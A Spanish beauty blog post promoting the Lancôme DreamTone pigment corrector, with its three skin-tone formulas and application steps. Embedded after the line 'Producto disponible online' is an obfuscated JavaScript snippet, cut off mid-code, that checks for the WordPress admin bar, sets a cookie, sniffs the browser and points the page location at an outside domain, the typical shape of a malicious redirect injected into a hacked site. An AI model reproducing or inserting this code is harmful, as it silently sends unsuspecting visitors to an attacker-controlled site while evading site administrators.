¡Hola amigas!

Después del verano, la piel tiene un aspecto un poco más estropeado de lo normal, debido a la exposición solar. Las manchas están más pronunciadas y la luminosidad brilla por su ausencia.

¿Cuántas de vosotras no desea tener una piel perfecta, con un tono uniforme y saludable? Si tienes una piel con manchas oscuras, tono desigual, irregularidades cromáticas, marcas y piel apagada, con este nuevo tratamiento de Lancôme DreamTone, puedes conseguir el tono de tus sueños, incluso sin maquillaje.

Este tratamiento es el primer corrector pigmentario de Lancôme, y es tan eficiente que el 68% de las mujeres se atreve a desnudar su piel. A través de su tecnología de triple acción, este corrector pigmentario se diseñó para corregir la aparición de manchas oscuras, el tono de la piel y las irregularidades cromáticas, tales como piel apagada, rojeces y manchas oscuras.

El producto existe en 3 fórmulas a medida para cada perfil de pigmentación, es decir, desde el más claro al más oscuro, para que cualquier mujer, sea cual sea el color de su piel, pueda utilizar un producto que se adapte a ella. Los resultados se pueden apreciar en tan sólo 8 semanas y se observa una reducción de las manchas del 66%.

Cómo aplicar DreamTone
Elija su perfil pigmentario:
Perfil Pigmentario 1 – Tono de piel claro (pieles que se queman fácilmente bajo la exposición al sol)
Perfil Pigmentario 2 – Tono de piel medio (pieles que se broncean fácilmente bajo la exposición al sol)
Perfil Pigmentario 3 – Tono de piel oscuro (pieles que se broncean profundamente bajo la exposición al sol).
Para corregir las manchas y el tono de piel, aplíquelo día y noche. Se puede aplicar en todo el rostro o en la irregularidad localizada, y posteriormente aplique su tratamiento habitual.

¡Consigue una piel luminosa y uniforme! 😉

Producto disponible online var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone